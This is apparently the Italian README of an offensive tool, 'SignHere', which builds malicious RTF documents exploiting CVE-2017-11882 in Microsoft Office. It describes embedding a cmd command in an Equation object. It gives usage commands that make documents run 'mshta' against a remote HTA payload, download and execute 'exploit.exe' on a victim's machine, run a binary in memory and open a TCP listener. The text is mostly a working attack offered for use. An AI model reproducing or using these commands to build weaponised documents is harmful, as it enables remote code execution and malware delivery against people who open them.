
SignHere è l'implementazione di CVE-2017-11882. SignHere è il builder di documenti rtf e payload VBScript malevoli.
CVE-2017-11882 - L'identificatore univoco della vulnerabilità di Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1 e Microsoft Office 2016 consente a un attaccante di eseguire codice nel contesto dell'utente corrente senza gestire correttamente gli oggetti in memoria, la cosiddetta "vulnerabilità di corruzione della memoria di Microsoft Office". L'implementazione include la creazione di un programma per costruire documenti RTF malevoli e payload in VBScript
Sono i documenti RTF a essere vulnerabili per il motivo che possono essere "programmati" conoscendo comandi speciali - intestazioni RTF. Pertanto, un oggetto binario (eseguibile) viene creato nel corpo del documento, di fatto è una formula di Microsoft Equation con il codice che contiene il comando cmd. Quindi è possibile generare il payload in VBScript e usare il comando "mshta link al file payload" per eseguire il file hta.
Autore e collaboratori non sono responsabili per eventuali danni causati a te o da te.
Puoi usare Termux, ma l'esecuzione del programma richiede i permessi di root
git clone https://github.com/Retr0-code/SignHere/
cd SignHere/
chmod +x SignHere.py
./SignHere.py --help
Per prima cosa, devi scaricare l'archivio. Poi estrailo e apri una finestra PowerShell in questa cartella e scrivi:
.\SignHere.py --help
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --powershell "start iexplore.exe https://github.com/Retr0-code/SignHere" --ip 192.168.1.74 --output generated.rtf
--cmd Argomento con il comando Windows che verrà eseguito dopo l'apertura del documento.
--powershell Argomento con il comando powershell che sarà nel payload VBScript.
--ip Argomento con l'indirizzo IP che verrà utilizzato per il server web. (default: 127.0.0.1)
--output Nome e percorso del documento.
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --temp exploit.exe --ip 192.168.1.74 --output generated.rtf
--temp Argomento che utilizzerà un file binario come payload (il file binario verrà avviato in memoria RAM).
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --payload exploit.exe --ip 192.168.1.74 --listener-host 192.168.1.74 --output generated.rtf
--payload Argomento che scaricherà un file sul computer della vittima e lo eseguirà.
--listener-host Argomento per avviare un listener TCP sull'IP corrente (default: 127.0.0.1)